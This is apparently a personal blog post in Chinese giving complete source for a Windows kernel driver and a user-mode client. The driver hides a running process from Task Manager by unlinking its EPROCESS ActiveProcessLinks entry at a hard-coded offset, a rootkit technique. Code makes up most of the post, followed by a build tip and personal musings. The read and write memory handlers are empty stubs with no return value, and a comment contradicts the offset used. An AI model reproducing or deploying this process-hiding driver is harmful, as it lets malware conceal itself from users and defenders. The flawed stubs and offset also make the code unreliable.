内核层如下:
读写进程内存不太想写,以后再补吧
#include <ntifs.h>
#define DEVICE_NAME L"\\Device\\MyDevice"
#define SYMLINK_NAME L"\\DosDevices\\MyDevice"
#define IOCTL_PROCESS_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
typedef struct MY_PROCESS_INFO {
ULONG Mode; // 模式:0 表示读,1 表示写
ULONG ProcessId; // 进程 PID
PVOID Address; // 目标地址
UCHAR Data[256]; // 数据内容(如果是写模式,将要写入的数据;如果是读模式,这里可以为空)
} MY_PROCESS_INFO, *P_MY_PROCESS_INFO;
NTSTATUS MmCopyVirtualMemory(
PEPROCESS SourceProcess,
PVOID SourceAddress,
PEPROCESS TargetProcess,
PVOID TargetAddress,
SIZE_T BufferSize,
KPROCESSOR_MODE PreviousMode,
PSIZE_T ReturnSize
);
NTSTATUS MyWriteProcessMemory(P_MY_PROCESS_INFO tempProcessInfo);
NTSTATUS MyReadProcessMemory(P_MY_PROCESS_INFO tempProcessInfo);
NTSTATUS MyHiddenProcess(P_MY_PROCESS_INFO tempProcessInfo);
NTSTATUS MyDriverDispatchIoctl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
DbgPrint("Receive Irp Request!");
PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
ULONG controlCode = stack->Parameters.DeviceIoControl.IoControlCode;
NTSTATUS status = STATUS_SUCCESS;
if (controlCode == IOCTL_PROCESS_MEMORY) {
P_MY_PROCESS_INFO tempProcessInfo = (P_MY_PROCESS_INFO)Irp->AssociatedIrp.SystemBuffer;
PEPROCESS targetProcess;
SIZE_T bytes;
// 根据 PID 打开目标进程
status = PsLookupProcessByProcessId((HANDLE)tempProcessInfo->ProcessId, &targetProcess);
if (!NT_SUCCESS(status)) {
DbgPrint("Failed to find process with PID %d\n", tempProcessInfo->ProcessId);
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
if (tempProcessInfo->Mode == 0) { // 读模式
// 读内存
MyReadProcessMemory(tempProcessInfo);
}
else if (tempProcessInfo->Mode == 1) { // 写模式
// 写内存
MyWriteProcessMemory(tempProcessInfo);
}else if(tempProcessInfo->Mode==3){
//隐藏进程
status=MyHiddenProcess(tempProcessInfo);
}
else {
status = STATUS_INVALID_PARAMETER;
DbgPrint("Invalid mode specified: %d\n", tempProcessInfo->Mode);
}
ObDereferenceObject(targetProcess); // 释放进程引用
Irp->IoStatus.Information = sizeof(MY_PROCESS_INFO);
}
else {
status = STATUS_INVALID_DEVICE_REQUEST;
Irp->IoStatus.Information = 0;
}
Irp->IoStatus.Status = status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS MyDriverCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
void MyDriverUnload(PDRIVER_OBJECT DriverObject) {
UNICODE_STRING symlink = RTL_CONSTANT_STRING(SYMLINK_NAME);
IoDeleteSymbolicLink(&symlink);
IoDeleteDevice(DriverObject->DeviceObject);
}
NTSTATUS MyWriteProcessMemory(P_MY_PROCESS_INFO tempProcessInfo) {
}
NTSTATUS MyReadProcessMemory(P_MY_PROCESS_INFO tempProcessInfo) {
}
NTSTATUS MyHiddenProcess(P_MY_PROCESS_INFO tempProcessInfo) {
PEPROCESS pProcess;
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)tempProcessInfo->ProcessId, &pProcess); // 使用 &pProcess
if (!NT_SUCCESS(status)) {
DbgPrint("Failed to find process with PID %lu, status: 0x%X\n", tempProcessInfo->ProcessId, status);
return status;
}
// 获取目标进程的 ActiveProcessLinks 链表指针
PLIST_ENTRY activeProcessLinks = (PLIST_ENTRY)((ULONG_PTR)pProcess +0x2f0); // 假设偏移量为0x2e8(仅为示例)
// 操作链表
PLIST_ENTRY prevEntry = activeProcessLinks->Blink;
PLIST_ENTRY nextEntry = activeProcessLinks->Flink;
// 从链表中移除该结点
prevEntry->Flink = nextEntry;
nextEntry->Blink = prevEntry;
// 清除目标进程的链表指针,防止悬挂指针
activeProcessLinks->Flink = activeProcessLinks;
activeProcessLinks->Blink = activeProcessLinks;
// 释放 EPROCESS 对象的引用
ObDereferenceObject(pProcess);
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DEVICE_NAME);
UNICODE_STRING symlink = RTL_CONSTANT_STRING(SYMLINK_NAME);
PDEVICE_OBJECT deviceObject = NULL;
NTSTATUS status;
status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &deviceObject);
if (!NT_SUCCESS(status)) {
return status;
}
status = IoCreateSymbolicLink(&symlink, &deviceName);
if (!NT_SUCCESS(status)) {
IoDeleteDevice(deviceObject);
return status;
}
DriverObject->MajorFunction[IRP_MJ_CREATE] = MyDriverCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MyDriverCreateClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyDriverDispatchIoctl;
DriverObject->DriverUnload = MyDriverUnload;
return STATUS_SUCCESS;
}
应用层:
#include <windows.h>
#include <iostream>
// 这里定义和驱动程序一致的 IOCTL 代码
#define IOCTL_PROCESS_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
// 定义与驱动程序中一致的结构体
typedef struct MY_PROCESS_INFO {
ULONG Mode; // 模式:0 表示读,1 表示写, 3 表示隐藏进程
ULONG ProcessId; // 进程 PID
PVOID Address; // 目标地址
UCHAR Data[256]; // 数据内容(如果是写模式,将要写入的数据;如果是读模式,这里可以为空)
} MY_PROCESS_INFO, * P_MY_PROCESS_INFO;
int main() {
// 打开符号链接名,连接到驱动程序
HANDLE hDevice = CreateFile(
L"\\\\.\\MyDevice", // 设备名称 (与驱动程序中的符号链接名一致)
GENERIC_READ | GENERIC_WRITE, // 打开权限
0, // 共享模式
NULL, // 安全属性
OPEN_EXISTING, // 打开已存在的设备
FILE_ATTRIBUTE_NORMAL, // 文件属性
NULL // 模板文件
);
if (hDevice == INVALID_HANDLE_VALUE) {
std::cerr << "Failed to open device: " << GetLastError() << std::endl;
return 1;
}
// 设置 MY_PROCESS_INFO 结构体
MY_PROCESS_INFO processInfo;
processInfo.Mode = 3; // 模式设置为 3 表示隐藏进程
processInfo.ProcessId = 2344; // 要隐藏的进程 ID
ZeroMemory(processInfo.Data, sizeof(processInfo.Data)); // 清空数据
DWORD bytesReturned;
BOOL success = DeviceIoControl(
hDevice, // 设备句柄
IOCTL_PROCESS_MEMORY, // IOCTL 代码
&processInfo, // 输入缓冲区
sizeof(MY_PROCESS_INFO), // 输入缓冲区大小
NULL, // 输出缓冲区
0, // 输出缓冲区大小
&bytesReturned, // 返回的字节数
NULL // 重叠结构
);
if (!success) {
std::cerr << "DeviceIoControl failed: " << GetLastError() << std::endl;
CloseHandle(hDevice);
return 1;
}
std::cout << "Process successfully hidden!" << std::endl;
// 关闭设备句柄
CloseHandle(hDevice);
return 0;
}
记一次踩坑点:
VisualStudio打包有debug和release两种模式,第一种模式,需要安装visual studio,在没有环境的系统上可能会报错。
效果:任务管理器里看不到计算器了
另:被一些事情搞得心情特别糟糕,目前做大模型研发,看文档看的一脸懵逼,却还想学习Windows内核,想学的太多,会的太少,另外想做的事情也特别多,到这个年纪可能就是这样吧。
天下的父母都是这样,当自己的孩子有点成就的时候,就特别愿意在别人面前讲。这个年纪,必须完成一些事情了,父母等不了你了。
